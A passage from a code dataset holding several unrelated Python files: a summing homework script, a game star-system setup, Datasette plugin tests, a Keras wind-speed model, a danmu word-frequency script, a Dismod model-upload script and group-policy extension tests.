end=\"\")\r\n#---------------------------------------------------------------------------------------------------------------\r\nnum_list = []\r\nnum_count = int (input (\"Enter count\"))\r\nwhile len(num_list) < num_count:\r\n num_list.append(int(input('Введіть число')))\r\nprint (num_list)\r\nsum = 0\r\nfor i in range (0,len(num_list)):\r\n sum += num_list[i]\r\nprint (sum)\r\n#------------------------------------------------------------------------------------------------------------------\r\nnum_list = []\r\nnum_count = int (input (\"Enter count\"))\r\nwhile len(num_list) < num_count:\r\n num_list.append(int(input('Введіть число')))\r\nprint (num_list)\r\ni = 0\r\nsum = 0\r\nwhile i != len(num_list):\r\n sum += num_list[i]\r\n i += 1\r\nprint (sum)","sub_path":"homework_8.py","file_name":"homework_8.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"240164899","text":"###############################################################################\n#\tFilename:\tItari8_S.py\n#\t\n#\tConfidential and Proprietary, Copyright 2001 by Totally Games\n#\t\n#\tCreates Itari 8 static objects. \n#\tCalled by Itari8.py when region is created\n#\t\n#\tCreated:\t10/04/01 - Tony Evans (Added Header)\n#\tModified:\t10/04/01 - Tony Evans\n###############################################################################\nimport App\nimport Tactical.LensFlares\n\ndef Initialize(pSet):\n\t# Add a sun, far far away\n\tpSun = App.Sun_Create(500.0, 500, 500)\n\tpSet.AddObjectToSet(pSun, \"Sun\")\n\t\n\t# Place the object at the specified location.\n\tpSun.PlaceObjectByName( \"Sun\" )\n\tpSun.UpdateNodeOnly()\n\n\t# Builds a Red-Orange lens flare, attached to the sun\n\tTactical.LensFlares.YellowLensFlare(pSet, pSun)\n\n\t# Planet\n\tpPlanet = App.Planet_Create(360.0, \"data/models/environment/BlueWhiteGasPlanet.nif\")\n\tpSet.AddObjectToSet(pPlanet, \"Itari 8\")\n\n\t# Place the object at the specified location.\n\tpPlanet.PlaceObjectByName( \"Planet\" )\n\tpPlanet.UpdateNodeOnly()\n\n\timport Custom.NanoFXv2.NanoFX_Lib\n\tCustom.NanoFXv2.NanoFX_Lib.CreateAtmosphereFX(pPlanet, \"data/models/environment/BlueWhiteGasPlanet.nif\", \"Class-M\")\n\n\t#Moon2\n\tpMoon2 = App.Planet_Create(90.0, \"data/models/environment/GreenPurplePlanet.nif\")\n\tpSet.AddObjectToSet(pMoon2, \"Moon 1\")\n\n\t# Place the object at the specified location.\n\tpMoon2.PlaceObjectByName( \"Moon1\" )\n\tpMoon2.UpdateNodeOnly()\n\n\t#Moon1\n\tpMoon1 = App.Planet_Create(15.0, \"data/models/environment/GrayPlanet.nif\")\n\tpSet.AddObjectToSet(pMoon1, \"Moon 2\")\n\n\t# Place the object at the specified location.\n\tpMoon1.PlaceObjectByName( \"Moon2\" )\n\tpMoon1.UpdateNodeOnly()\n\n\n\n","sub_path":"scripts/Custom/NanoFXv2/SpecialFX/Systems/Itari/Itari8_S.py","file_name":"Itari8_S.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"252399369","text":"from bs4 import BeautifulSoup as Soup\nfrom .fixtures import app_client, make_app_client, TEMP_PLUGIN_SECRET_FILE # noqa\nfrom datasette.utils import sqlite3\nimport base64\nimport json\nimport os\nimport pathlib\nimport re\nimport pytest\nimport urllib\n\n\ndef test_plugins_dir_plugin(app_client):\n response = app_client.get(\n \"/fixtures.json?sql=select+convert_units(100%2C+'m'%2C+'ft')\"\n )\n assert pytest.approx(328.0839) == response.json[\"rows\"][0][0]\n\n\n@pytest.mark.parametrize(\n \"path,expected_decoded_object\",\n [\n (\"/\", {\"template\": \"index.html\", \"database\": None, \"table\": None}),\n (\n \"/fixtures/\",\n {\"template\": \"database.html\", \"database\": \"fixtures\", \"table\": None},\n ),\n (\n \"/fixtures/sortable\",\n {\"template\": \"table.html\", \"database\": \"fixtures\", \"table\": \"sortable\"},\n ),\n ],\n)\ndef test_plugin_extra_css_urls(app_client, path, expected_decoded_object):\n response = app_client.get(path)\n links = Soup(response.body, \"html.parser\").findAll(\"link\")\n special_href = [\n l for l in links if l.attrs[\"href\"].endswith(\"/extra-css-urls-demo.css\")\n ][0][\"href\"]\n # This link has a base64-encoded JSON blob in it\n encoded = special_href.split(\"/\")[3]\n assert expected_decoded_object == json.loads(\n base64.b64decode(encoded).decode(\"utf8\")\n )\n\n\ndef test_plugin_extra_js_urls(app_client):\n response = app_client.get(\"/\")\n scripts = Soup(response.body, \"html.parser\").findAll(\"script\")\n assert [\n s\n for s in scripts\n if s.attrs\n == {\n \"integrity\": \"SRIHASH\",\n \"crossorigin\": \"anonymous\",\n \"src\": \"https://example.com/jquery.js\",\n }\n ]\n\n\ndef test_plugins_with_duplicate_js_urls(app_client):\n # If two plugins both require jQuery, jQuery should be loaded only once\n response = app_client.get(\"/fixtures\")\n # This test is a little tricky, as if the user has any other plugins in\n # their current virtual environment those may affect what comes back too.\n # What matters is that https://example.com/jquery.js is only there once\n # and it comes before plugin1.js and plugin2.js which could be in either\n # order\n scripts = Soup(response.body, \"html.parser\").findAll(\"script\")\n srcs = [s[\"src\"] for s in scripts if s.get(\"src\")]\n # No duplicates allowed:\n assert len(srcs) == len(set(srcs))\n # jquery.js loaded once:\n assert 1 == srcs.count(\"https://example.com/jquery.js\")\n # plugin1.js and plugin2.js are both there:\n assert 1 == srcs.count(\"https://example.com/plugin1.js\")\n assert 1 == srcs.count(\"https://example.com/plugin2.js\")\n # jquery comes before them both\n assert srcs.index(\"https://example.com/jquery.js\") < srcs.index(\n \"https://example.com/plugin1.js\"\n )\n assert srcs.index(\"https://example.com/jquery.js\") < srcs.index(\n \"https://example.com/plugin2.js\"\n )\n\n\ndef test_plugins_render_cell_link_from_json(app_client):\n sql = \"\"\"\n select '{\"href\": \"http://example.com/\", \"label\":\"Example\"}'\n \"\"\".strip()\n path = \"/fixtures?\" + urllib.parse.urlencode({\"sql\": sql})\n response = app_client.get(path)\n td = Soup(response.body, \"html.parser\").find(\"table\").find(\"tbody\").find(\"td\")\n a = td.find(\"a\")\n assert a is not None, str(a)\n assert a.attrs[\"href\"] == \"http://example.com/\"\n assert a.attrs[\"data-database\"] == \"fixtures\"\n assert a.text == \"Example\"\n\n\ndef test_plugins_render_cell_demo(app_client):\n response = app_client.get(\"/fixtures/simple_primary_key?id=4\")\n soup = Soup(response.body, \"html.parser\")\n td = soup.find(\"td\", {\"class\": \"col-content\"})\n assert {\n \"column\": \"content\",\n \"table\": \"simple_primary_key\",\n \"database\": \"fixtures\",\n \"config\": {\"depth\": \"table\", \"special\": \"this-is-simple_primary_key\"},\n } == json.loads(td.string)\n\n\ndef test_plugin_config(app_client):\n assert {\"depth\": \"table\"} == app_client.ds.plugin_config(\n \"name-of-plugin\", database=\"fixtures\", table=\"sortable\"\n )\n assert {\"depth\": \"database\"} == app_client.ds.plugin_config(\n \"name-of-plugin\", database=\"fixtures\", table=\"unknown_table\"\n )\n assert {\"depth\": \"database\"} == app_client.ds.plugin_config(\n \"name-of-plugin\", database=\"fixtures\"\n )\n assert {\"depth\": \"root\"} == app_client.ds.plugin_config(\n \"name-of-plugin\", database=\"unknown_database\"\n )\n assert {\"depth\": \"root\"} == app_client.ds.plugin_config(\"name-of-plugin\")\n assert None is app_client.ds.plugin_config(\"unknown-plugin\")\n\n\ndef test_plugin_config_env(app_client):\n os.environ[\"FOO_ENV\"] = \"FROM_ENVIRONMENT\"\n assert {\"foo\": \"FROM_ENVIRONMENT\"} == app_client.ds.plugin_config(\"env-plugin\")\n # Ensure secrets aren't visible in /-/metadata.json\n metadata = app_client.get(\"/-/metadata.json\")\n assert {\"foo\": {\"$env\": \"FOO_ENV\"}} == metadata.json[\"plugins\"][\"env-plugin\"]\n del os.environ[\"FOO_ENV\"]\n\n\ndef test_plugin_config_file(app_client):\n open(TEMP_PLUGIN_SECRET_FILE, \"w\").write(\"FROM_FILE\")\n assert {\"foo\": \"FROM_FILE\"} == app_client.ds.plugin_config(\"file-plugin\")\n # Ensure secrets aren't visible in /-/metadata.json\n metadata = app_client.get(\"/-/metadata.json\")\n assert {\"foo\": {\"$file\": TEMP_PLUGIN_SECRET_FILE}} == metadata.json[\"plugins\"][\n \"file-plugin\"\n ]\n os.remove(TEMP_PLUGIN_SECRET_FILE)\n\n\n@pytest.mark.parametrize(\n \"path,expected_extra_body_script\",\n [\n (\n \"/\",\n {\n \"template\": \"index.html\",\n \"database\": None,\n \"table\": None,\n \"config\": {\"depth\": \"root\"},\n },\n ),\n (\n \"/fixtures/\",\n {\n \"template\": \"database.html\",\n \"database\": \"fixtures\",\n \"table\": None,\n \"config\": {\"depth\": \"database\"},\n },\n ),\n (\n \"/fixtures/sortable\",\n {\n \"template\": \"table.html\",\n \"database\": \"fixtures\",\n \"table\": \"sortable\",\n \"config\": {\"depth\": \"table\"},\n },\n ),\n ],\n)\ndef test_plugins_extra_body_script(app_client, path, expected_extra_body_script):\n r = re.compile(r\"\")\n json_data = r.search(app_client.get(path).body.decode(\"utf8\")).group(1)\n actual_data = json.loads(json_data)\n assert expected_extra_body_script == actual_data\n\n\ndef test_plugins_asgi_wrapper(app_client):\n response = app_client.get(\"/fixtures\")\n assert \"fixtures\" == response.headers[\"x-databases\"]\n\n\ndef test_plugins_extra_template_vars(restore_working_directory):\n for client in make_app_client(\n template_dir=str(pathlib.Path(__file__).parent / \"test_templates\")\n ):\n response = client.get(\"/-/metadata\")\n assert response.status == 200\n extra_template_vars = json.loads(\n Soup(response.body, \"html.parser\").select(\"pre.extra_template_vars\")[0].text\n )\n assert {\n \"template\": \"show_json.html\",\n \"scope_path\": \"/-/metadata\",\n } == extra_template_vars\n extra_template_vars_from_awaitable = json.loads(\n Soup(response.body, \"html.parser\")\n .select(\"pre.extra_template_vars_from_awaitable\")[0]\n .text\n )\n assert {\n \"template\": \"show_json.html\",\n \"awaitable\": True,\n \"scope_path\": \"/-/metadata\",\n } == extra_template_vars_from_awaitable\n\n\ndef test_plugins_async_template_function(restore_working_directory):\n for client in make_app_client(\n template_dir=str(pathlib.Path(__file__).parent / \"test_templates\")\n ):\n response = client.get(\"/-/metadata\")\n assert response.status == 200\n extra_from_awaitable_function = (\n Soup(response.body, \"html.parser\")\n .select(\"pre.extra_from_awaitable_function\")[0]\n .text\n )\n expected = (\n sqlite3.connect(\":memory:\").execute(\"select sqlite_version()\").fetchone()[0]\n )\n assert expected == extra_from_awaitable_function\n","sub_path":"tests/test_plugins.py","file_name":"test_plugins.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"287121963","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, SimpleRNN, Activation , Dropout\nfrom sklearn.metrics import mean_squared_error\nfrom keras.optimizers import RMSprop, Adam\nfrom numpy.random import seed\nfrom common_misc import load_data_from_pkl\n\n\n# Create model\ndef create_fc_model():\n model = Sequential([\n Dense(30, input_dim=15, kernel_initializer='RandomNormal'),\n Activation('elu'),\n Dropout(rate=0.4, seed=True),\n Dense(10),\n Activation('elu'),\n Dense(1)\n ])\n return model\n\n# Create model\ndef create_fc_model2():\n model = Sequential()\n model.add(\n SimpleRNN(20, stateful=False, return_sequences=False, batch_input_shape=(1, 15, 1), activation='relu'))\n model.add(Dense(1))\n return model\n\n\nx_train, y_train = load_data_from_pkl('data/turbine_1_train.pkl')\nx_test, y_test = load_data_from_pkl('data/turbine_1_test.pkl')\n\ndata_train = pd.concat([x_train, y_train], axis=1)\ndata_test = pd.concat([x_test, y_test], axis=1)\n\n# drop out nan value\ndata_train = data_train.dropna(subset=['Y.ws_tb'])\ndata_train = data_train[np.isnan(data_train['GFS0.ws']) == False]\ndata_train = data_train[np.isnan(data_train['WRF0.ws']) == False]\ndata_test = data_test.dropna(subset=['Y.ws_tb'])\n\nx_train = data_train[['EC0.ws','EC0.wd','EC0.tmp','EC0.rho','EC0.pres',\n'GFS0.ws','GFS0.wd','GFS0.tmp','GFS0.rho','GFS0.pres',\n'WRF0.ws','WRF0.wd','WRF0.tmp','WRF0.rho','WRF0.pres']]\ncount1=len(x_train)\nprint(count1)\ny_train=data_train['Y.ws_tb']\nx_test=data_test[['EC0.ws','EC0.wd','EC0.tmp','EC0.rho','EC0.pres',\n'GFS0.ws','GFS0.wd','GFS0.tmp','GFS0.rho','GFS0.pres',\n'WRF0.ws','WRF0.wd','WRF0.tmp','WRF0.rho','WRF0.pres']]\ncount2=len(x_test)\ny_test=data_test['Y.ws_tb']\n\n\"\"\"\nx_train=x_train.values\nx_train = x_train.reshape(count1,15,1)\ny_train=y_train.values\ny_train = y_train.reshape(count1,1)\nx_test=x_test.values\nx_test = x_test.reshape(count2,15,1)\ny_test=y_test.values\ny_test = y_test.reshape(count2,1)\n\"\"\"\n\nprint('x_train.shape: ', x_train.shape)\nprint('y_train.shape: ', y_train.shape)\nprint('x_test.shape: ', x_test.shape)\nprint('y_test.shape: ', y_test.shape)\n\n\nepochs=20\n# Create the model\nprint('Creating Fully-Connected Model...')\nmodel_fc = create_fc_model()\nadam=Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.00005)\nrmsprop = RMSprop(lr=0.001, rho=0.9, epsilon=1e-08, decay=0.00005)\nmodel_fc.compile(optimizer=adam, loss='mean_squared_error')\n# Train the model\nprint('Training')\n##### TRAIN YOUR MODEL #####\nhistory = model_fc.fit(x_train, y_train, epochs=epochs, batch_size=1, validation_data=(x_test, y_test), shuffle=False)\n\n# Plot and save loss curves of training and test set vs iteration in the same graph\n##### PLOT AND SAVE LOSS CURVES #####\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\npredicted_fc = model_fc.predict(x_test, batch_size=1)\n##### CALCULATE RMSE #####\nfc_rmse = np.sqrt(mean_squared_error(y_test, predicted_fc))\nprint(fc_rmse)\n\nplt.figure(figsize=(8, 5))\nplt.plot(np.arange(1, epochs+1), loss, label='train_loss')\nplt.plot(np.arange(1, epochs+1), val_loss, label='val_loss')\nplt.title('Loss vs Iterations in Training and Validation Set')\nplt.xlabel('Iterations')\nplt.ylabel('Loss')\nx_label = range(1, epochs+1)\nplt.xticks(x_label)\nplt.legend()\nplt.grid()\nplt.show()\n\n","sub_path":"envision/neural network.py","file_name":"neural network.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"54793784","text":"'''\n统计弹幕中词语出现的频率\n'''\n\nimport jieba\nimport fool\nimport time\nimport datetime\nfrom dbHelper import DouyuDanmuDao\nimport targetConfig\n\n#从数据库获取弹幕内容\ndef getBarragesFromDatabase(date):\n date = date.timetuple() # 转换时间格式\n\n SQL = f\"select txt from barrages \" \\\n f\" where Date(stime)=\\'{targetConfig.targetDate.strftime('%Y-%m-%d')}\\'\"\n\n danmuDao = DouyuDanmuDao()\n danmuDao.connect()\n\n data = danmuDao.excuteQuery(SQL)\n if not data:\n return -1\n\n danmuDao.disConnect()\n return data\n\n\n#统计弹幕中的词频\ndef getWordStatsWithJieba(data):\n \"\"\"\n :param data: tuple类型的数据,data【n】【0】是弹幕数据\n :return:\n \"\"\"\n wordFrequency = {}\n\n for i in range(len(data)):\n barrage = data[i][0]\n for word in jieba.cut_for_search(barrage):\n if word in wordFrequency.keys():\n wordFrequency[word]+=1\n else:\n wordFrequency[word] = 1\n return wordFrequency\n\ndef getWordStatsWithFool(data):\n \"\"\"\n\n :param data: tuple类型的数据,data【n】【0】是弹幕数据\n :return:\n \"\"\"\n wordFrequency = {}\n\n for i in range(len(data)):\n barrage = data[i][0]\n # print(fool.cut(barrage))\n for word in fool.cut(barrage)[0]:\n # print(word)\n if word in wordFrequency.keys():\n wordFrequency[word]+=1\n else:\n wordFrequency[word] = 1\n return wordFrequency\n\n\n#绘制词云图\nfrom pyecharts.charts import WordCloud\nfrom pyecharts import options as opts\nfrom pyecharts.globals import SymbolType\n\ndef wordCloud(barrageStats):\n # WordCloud模块,链式调用配置,最终生成html文件\n c = (\n WordCloud()\n .add(\"\", barrageStats, word_size_range=[20, 100], shape=SymbolType.DIAMOND)\n .set_global_opts(title_opts=opts.TitleOpts(title=\"词语频率\"))\n .render(\"词语频率.html\")\n )\n\n\n#主函数\ndef main():\n date = targetConfig.targetDate\n data = getBarragesFromDatabase(date)\n print(type(data))\n print(data)\n\n #获取词频\n wordStats = getWordStatsWithJieba(data)\n del data\n\n wordStats = sorted(wordStats.items(),key=lambda item:item[1],reverse=True)\n print(wordStats)\n for word in wordStats[:50]:\n print(word)\n wordCloud(wordStats)\n\nif __name__ == '__main__':\n main()","sub_path":"src/DataAnalysis/wordFrequency.py","file_name":"wordFrequency.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"336989529","text":"import logging\nimport os\nimport re\nimport shutil\nimport subprocess\n\nfrom cascade_ode import upload\nfrom cascade_ode import fit_stats\nfrom cascade_ode import drill\nfrom cascade_ode.argument_parser import cascade_parser\nfrom cascade_ode.patch_io import setup_io_patches\nfrom cascade_ode.demographics import Demographics\nfrom cascade_ode import importer\nfrom cascade_ode import __version__\nfrom cascade_ode.run_all import prepare_directories\nfrom cascade_ode.setup_logger import setup_logger\nfrom cascade_ode.sge import get_commit_hash\nfrom cascade_ode.shared_functions import DismodSaveResults\nfrom db_tools.ezfuncs import query\nfrom db_queries import get_location_metadata\nfrom gbd.decomp_step import decomp_step_from_decomp_step_id\nimport sqlalchemy\n\n# Set default file mask to readable-for all users\nos.umask(0o0002)\n\n\ndef parse_args(args=None):\n parser = cascade_parser(\"Upload model, plot, aggregate up hierarchy.\")\n parser.add_argument('mvid', type=int)\n return parser.parse_args(args)\n\n\ndef main():\n '''Set commit hash, upload model, try to write effects_plots pdfs,\n aggregate model version draws up location hierarchy\n '''\n args = parse_args()\n mvid = args.mvid\n default_debug_level = -1\n dirs = prepare_directories(mvid, create_directories=False)\n logging_filepath = '%s/%s' % (\n dirs['model_logdir'], f'{args.mvid}_varnish.log')\n setup_logger(\n logging_filepath,\n level=args.quiet - args.verbose + default_debug_level)\n\n log = logging.getLogger(__name__)\n log.info(\"Varnish started for mvid {}\".format(mvid))\n setup_io_patches(args.no_upload)\n\n try:\n try:\n commit_hash = get_commit_hash(dir='%s/..' % drill.this_path)\n except subprocess.CalledProcessError:\n # in site-packages, not git repo\n commit_hash = __version__\n\n upload.set_commit_hash(mvid, commit_hash)\n upload.upload_model(mvid)\n\n outdir = \"%s/%s/full\" % (\n drill.settings['cascade_ode_out_dir'],\n str(mvid))\n joutdir = \"%s/%s\" % (drill.settings['diag_out_dir'], mvid)\n fit_df = fit_stats.write_fit_stats(mvid, outdir, joutdir)\n if fit_df is not None:\n try:\n upload.upload_fit_stat(mvid)\n except sqlalchemy.exc.IntegrityError:\n log.warning(\"fit stat already uploaded -- skipping\")\n else:\n log.warning(\"No fit stats computed\")\n\n # Write effect PDFs\n plotter = \"{}/effect_plots.r\".format(drill.this_path)\n plotter = os.path.realpath(plotter)\n\n demo = Demographics(mvid)\n try:\n subprocess.check_output([\n \"Rscript\",\n plotter,\n str(mvid),\n joutdir,\n drill.settings['cascade_ode_out_dir'],\n str(max(demo.year_ids))],\n stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError:\n log.exception(\"Error in effect plots\")\n\n # Clean aggregations to ensure idempotentcy\n decomp_step = decomp_step_from_decomp_step_id(\n importer.get_model_version(mvid).decomp_step_id.unique()[0])\n clean_model_directory(outdir, demo.gbd_round_id, decomp_step)\n\n # Launch final aggregations\n log.info(\"Starting Save Results\")\n aggregate_model(mvid, demo=demo, no_upload=args.no_upload)\n except Exception:\n log.exception(\"Error in varnish\")\n raise\n\n\ndef aggregate_model(mvid, demo, no_upload=False):\n '''call save_results to create location aggregates,\n upload summaries to epi.model_estimate_final,\n mark model as finished'''\n agg_args = get_aggregation_arguments(mvid, demo)\n\n dsr = DismodSaveResults(\n input_dir=agg_args['input_dir'],\n input_file_pattern=agg_args['input_file_pattern'],\n model_version_id=mvid,\n modelable_entity_id=agg_args['modelable_entity_id'],\n description=agg_args['description'],\n year_id=agg_args['year_id'],\n sex_id=agg_args['sex_id'],\n measure_id=agg_args['measure_id'],\n db_env=agg_args['db_env'],\n gbd_round_id=agg_args['gbd_round_id'],\n birth_prevalence=agg_args['birth_prevalence'],\n decomp_step=agg_args['decomp_step'])\n if not no_upload:\n dsr.run()\n\n return dsr\n\n\ndef get_aggregation_arguments(mvid, demo):\n casc = drill.Cascade(\n mvid, root_dir=drill.settings['cascade_ode_out_dir'],\n reimport=False)\n mvm = casc.model_version_meta\n db_env = drill.settings['env_variables']['ENVIRONMENT_NAME']\n\n agg_args = {}\n agg_args['input_dir'] = os.path.join(casc.root_dir, 'draws')\n agg_args['input_file_pattern'] = '{location_id}_{year_id}_{sex_id}.h5'\n agg_args['modelable_entity_id'] = mvm.modelable_entity_id.iat[0]\n agg_args['description'] = mvm.description.iat[0]\n agg_args['year_id'] = demo.year_ids\n agg_args['sex_id'] = demo.sex_ids\n agg_args['measure_id'] = get_measures_from_casc(casc)\n agg_args['db_env'] = db_env\n agg_args['gbd_round_id'] = demo.gbd_round_id\n agg_args['birth_prevalence'] = mvm.birth_prev.fillna(0).replace(\n {0: False, 1: True}).iat[0]\n agg_args['decomp_step'] = mvm.decomp_step.iat[0]\n\n return agg_args\n\n\ndef get_measures_from_casc(casc):\n measure_only = casc.model_version_meta.measure_only\n if measure_only.notnull().all():\n return measure_only.iat[0]\n\n q = \"select measure_id from shared.measure where measure in ('{}')\".format(\n \"', '\".join(importer.integrand_pred))\n df = query(q, conn_def=\"epi\")\n return sorted(df.measure_id.tolist())\n\n\ndef clean_model_directory(outdir, gbd_round_id, decomp_step):\n '''Removes past (maybe corrupt) .h5 aggregate files and summary directory\n for a given varnish job run.\n Args:\n outdir (str): full output directory of a cascade model\n gbd_round_id (int): gbd_round_id for which to get location metadata\n '''\n draw_path = os.path.join(outdir, 'draws')\n # remove summary file\n if os.path.exists(os.path.join(draw_path, 'summaries')):\n shutil.rmtree(os.path.join(draw_path, 'summaries'))\n # remove aggregated draw files\n files_to_remove = get_files_to_remove(\n os.listdir(draw_path), gbd_round_id, decomp_step)\n for file in files_to_remove:\n os.remove(os.path.join(draw_path, file))\n\n\ndef get_files_to_remove(dir_list, gbd_round_id, decomp_step):\n '''\n To make varnish.py idempotent, find aggregate location files to delete\n '''\n loc_df = get_location_metadata(\n location_set_id=35,\n gbd_round_id=gbd_round_id,\n decomp_step=decomp_step)\n locs = loc_df.loc[loc_df.most_detailed != 1].location_id.tolist()\n location_substr = \"|\".join([str(l) for l in locs])\n regex = f\"({location_substr})_.*.h5$\"\n files_to_remove = [f for f in dir_list if re.match(regex, f)]\n return files_to_remove\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"gbd_2019/shared_code/central_comp/nonfatal/dismod/varnish.py","file_name":"varnish.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"96449451","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\n\nfrom neutron_lib import constants as n_constants\nfrom neutron_lib.plugins import constants\nimport six\n\nfrom gbpservice.neutron.extensions import group_policy as gp\nfrom gbpservice.neutron.extensions import group_policy_mapping as gpm\nfrom gbpservice.neutron.tests.unit import common as cm\nfrom gbpservice.neutron.tests.unit import test_extension_group_policy as tgp\n\n\nclass GroupPolicyMappingExtTestCase(tgp.GroupPolicyExtensionTestCase):\n def setUp(self):\n self._saved_gp_attr_map = {}\n for k, v in six.iteritems(gp.RESOURCE_ATTRIBUTE_MAP):\n self._saved_gp_attr_map[k] = v.copy()\n self.addCleanup(self._restore_gp_attr_map)\n\n super(tgp.GroupPolicyExtensionTestCase, self).setUp()\n\n attr_map = gp.RESOURCE_ATTRIBUTE_MAP\n attr_map[gp.POLICY_TARGETS].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.POLICY_TARGETS])\n attr_map[gp.POLICY_TARGET_GROUPS].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.POLICY_TARGET_GROUPS])\n attr_map[gp.L2_POLICIES].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.L2_POLICIES])\n attr_map[gp.L3_POLICIES].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.L3_POLICIES])\n attr_map[gp.EXTERNAL_SEGMENTS].update(\n gpm.EXTENDED_ATTRIBUTES_2_0[gp.EXTERNAL_SEGMENTS])\n plural_mappings = {'l2_policy': 'l2_policies',\n 'l3_policy': 'l3_policies',\n 'network_service_policy':\n 'network_service_policies',\n 'external_policy':\n 'external_policies'}\n self.setup_extension(\n tgp.GP_PLUGIN_BASE_NAME, constants.GROUP_POLICY,\n gp.Group_policy, tgp.GROUPPOLICY_URI,\n plural_mappings=plural_mappings)\n self.instance = self.plugin.return_value\n\n def _restore_gp_attr_map(self):\n gp.RESOURCE_ATTRIBUTE_MAP = self._saved_gp_attr_map\n\n def get_create_policy_target_default_attrs(self):\n attrs = cm.get_create_policy_target_default_attrs()\n attrs.update({'port_id': None})\n return attrs\n\n def get_create_policy_target_default_attrs_and_prj_id(self):\n attrs = cm.get_create_policy_target_default_attrs_and_prj_id()\n attrs.update({'port_id': None})\n return attrs\n\n def get_create_policy_target_attrs(self):\n attrs = cm.get_create_policy_target_attrs()\n attrs.update({'port_id': tgp._uuid()})\n fixed_ips = [{'subnet_id': '00000000-ffff-ffff-ffff-000000000000',\n 'ip_address': '11.1.1.1'}]\n attrs.update({'fixed_ips': fixed_ips})\n return attrs\n\n def get_update_policy_target_attrs(self):\n attrs = cm.get_update_policy_target_attrs()\n fixed_ips = [{'subnet_id': '00000000-ffff-ffff-ffff-000000000000',\n 'ip_address': '11.1.1.1'}]\n attrs.update({'fixed_ips': fixed_ips})\n return attrs\n\n def get_create_policy_target_group_default_attrs(self):\n attrs = cm.get_create_policy_target_group_default_attrs()\n attrs.update({'subnets': []})\n return attrs\n\n def get_create_policy_target_group_default_attrs_and_prj_id(self):\n attrs = cm.get_create_policy_target_group_default_attrs_and_prj_id()\n attrs.update({'subnets': []})\n return attrs\n\n def get_create_policy_target_group_attrs(self):\n attrs = cm.get_create_policy_target_group_attrs()\n attrs.update({'subnets': [tgp._uuid()]})\n return attrs\n\n def get_update_policy_target_group_attrs(self):\n attrs = cm.get_update_policy_target_group_attrs()\n attrs.update({'subnets': [tgp._uuid()]})\n return attrs\n\n def get_create_l2_policy_default_attrs(self):\n attrs = cm.get_create_l2_policy_default_attrs()\n attrs.update({'network_id': None})\n return attrs\n\n def get_create_l2_policy_default_attrs_and_prj_id(self):\n attrs = cm.get_create_l2_policy_default_attrs_and_prj_id()\n attrs.update({'network_id': None})\n return attrs\n\n def get_create_l2_policy_attrs(self):\n attrs = cm.get_create_l2_policy_attrs()\n attrs.update({'network_id': tgp._uuid()})\n return attrs\n\n def get_create_l3_policy_default_attrs(self):\n attrs = cm.get_create_l3_policy_default_attrs()\n attrs.update({'address_scope_v4_id': None})\n attrs.update({'address_scope_v6_id': None})\n attrs.update({'subnetpools_v4': []})\n attrs.update({'subnetpools_v6': []})\n attrs.update({'routers': []})\n return attrs\n\n def get_create_l3_policy_default_attrs_and_prj_id(self):\n attrs = cm.get_create_l3_policy_default_attrs_and_prj_id()\n attrs.update({'address_scope_v4_id': None})\n attrs.update({'address_scope_v6_id': None})\n attrs.update({'subnetpools_v4': []})\n attrs.update({'subnetpools_v6': []})\n attrs.update({'routers': []})\n return attrs\n\n def get_create_l3_policy_attrs(self):\n attrs = cm.get_create_l3_policy_attrs()\n attrs.update({'address_scope_v4_id': tgp._uuid()})\n attrs.update({'address_scope_v6_id': tgp._uuid()})\n attrs.update({'subnetpools_v4': [tgp._uuid(), tgp._uuid()]})\n attrs.update({'subnetpools_v6': [tgp._uuid(), tgp._uuid()]})\n attrs.update({'routers': [tgp._uuid(), tgp._uuid()]})\n return attrs\n\n def get_update_l3_policy_attrs(self):\n attrs = cm.get_update_l3_policy_attrs()\n attrs.update({'subnetpools_v4': [tgp._uuid(), tgp._uuid()]})\n attrs.update({'subnetpools_v6': [tgp._uuid(), tgp._uuid()]})\n attrs.update({'routers': [tgp._uuid(), tgp._uuid()]})\n return attrs\n\n def get_create_external_segment_default_attrs(self):\n attrs = cm.get_create_external_segment_default_attrs()\n attrs.update({'subnet_id': None})\n return attrs\n\n def get_create_external_segment_default_attrs_and_prj_id(self):\n attrs = cm.get_create_external_segment_default_attrs_and_prj_id()\n attrs.update({'subnet_id': None})\n return attrs\n\n def get_create_external_segment_attrs(self):\n attrs = cm.get_create_external_segment_attrs()\n attrs.update({'subnet_id': tgp._uuid()})\n return attrs\n\n def test_create_policy_target_with_defaults(self):\n policy_target_id = tgp._uuid()\n data = {'policy_target': {'policy_target_group_id': tgp._uuid(),\n 'tenant_id': tgp._uuid()}}\n default_attrs = (\n self.get_create_policy_target_default_attrs_and_prj_id())\n default_data = copy.copy(data)\n default_data['policy_target'].update(default_attrs)\n expected_value = dict(default_data['policy_target'])\n expected_value['id'] = policy_target_id\n expected_value['fixed_ips'] = 